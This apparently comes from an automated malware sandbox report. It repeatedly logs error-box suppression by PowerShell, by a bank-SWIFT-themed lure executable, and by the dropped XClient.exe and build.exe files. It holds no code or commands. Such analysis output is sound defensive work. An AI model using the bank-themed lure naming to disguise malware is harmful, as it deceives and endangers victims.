Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
